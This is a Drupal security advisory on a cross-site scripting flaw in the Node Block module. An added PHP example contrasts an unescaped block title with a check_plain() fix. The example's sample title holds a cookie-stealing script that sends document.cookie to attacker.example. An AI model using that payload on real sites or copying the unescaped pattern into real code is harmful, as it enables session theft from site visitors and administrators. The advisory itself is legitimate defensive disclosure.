- Advisory ID: DRUPAL-SA-CONTRIB-2010-004
- Project: Node Block (third-party module)
- Version: 6.13, 5.11
- Date: 2010-January-13
- Security risk: Moderately critical
- Exploitable from: Remote
- Vulnerability: Cross Site Scripting
This module allows you to specify content type(s) as being a block. This allows the content managers of the site to edit the block text and title without having to access the block administration page. Users only need edit access to that node in order to edit it. Users with administer block access will see region and weight options on the node form.
The Node Block module creates a block from specified content type(s). Node Block does not properly escape node titles before using them as block titles, allowing users who have permission to create or edit nodes of the specified content type(s) to inject arbitrary HTML and script into every page where the block is displayed. Such a cross site scripting (XSS) attack may lead to a malicious user gaining full administrative access, for example by stealing an administrator's session or performing actions in their browser.
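The following is an added illustration of the flaw class described above; it is not the Node Block module's own code, and the function and variable names (nodeblock_vulnerable_block, nodeblock_fixed_block, example_load_node) are assumptions for this example. It shows a Drupal 6 style hook_block() implementation that turns a node into a block, first with the node title copied into the block 'subject' unescaped, then with the title passed through check_plain(). The node title is a constructed sample.

```php
<?php
// Added example (not the Node Block module's code). Drupal 6 blocks return
// 'subject' and 'content' from hook_block($op = 'view'); the theme layer
// prints 'subject' as HTML, so whatever a node editor typed into the title
// lands in the page of every visitor, administrators included.

// Stand-in for Drupal 6's check_plain() so this file runs outside Drupal.
if (!function_exists('check_plain')) {
  function check_plain($text) {
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
  }
}

// Constructed sample node: a user with edit access to this content type
// saved a title carrying a script tag. In Drupal this would be node_load().
function example_load_node($nid) {
  $node = new stdClass();
  $node->nid = $nid;
  $node->title = '<script>new Image().src="http://attacker.example/?c="+document.cookie;</script>Welcome';
  // Body handling (input formats / check_markup) is out of scope here.
  $node->body = '<p>Block body.</p>';
  return $node;
}

// VULNERABLE: the title is emitted verbatim as the block subject.
function nodeblock_vulnerable_block($op = 'list', $delta = 0) {
  if ($op == 'view') {
    $node = example_load_node($delta);
    return array(
      'subject' => $node->title,
      'content' => $node->body,
    );
  }
  return array();
}

// FIXED: escape the title before it reaches the theme layer. Any other
// user-controlled string that ends up in 'subject' needs the same treatment.
function nodeblock_fixed_block($op = 'list', $delta = 0) {
  if ($op == 'view') {
    $node = example_load_node($delta);
    return array(
      'subject' => check_plain($node->title),
      'content' => $node->body,
    );
  }
  return array();
}

$vulnerable = nodeblock_vulnerable_block('view', 42);
$fixed = nodeblock_fixed_block('view', 42);
echo "vulnerable subject:\n" . $vulnerable['subject'] . "\n\n";
echo "fixed subject:\n" . $fixed['subject'] . "\n";
```

Run under the PHP CLI the vulnerable subject prints the raw script tag, while the fixed subject prints it with `<`, `>` and `"` encoded as entities, which is what a browser must receive for the title to be displayed rather than executed. When auditing a block-providing module, check every value it places in 'subject' against the same rule.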
- Node Blocks module 5.x-1.1 and prior versions
- Node Blocks module 6.x-1.3 and prior versions
Drupal core is not affected. If you do not use the contributed Node Block module, there is nothing you need to do.
Install the latest version:
- If you use the Node Blocks module for Drupal 5.x upgrade to Node Blocks 5.x-1.2
- If you use the Node Blocks module for Drupal 6.x upgrade to Node Blocks 6.x-1.4
See also the Node Block project page.
The security contact for Drupal can be reached at security at drupal.org or via the form at http://drupal.org/contact.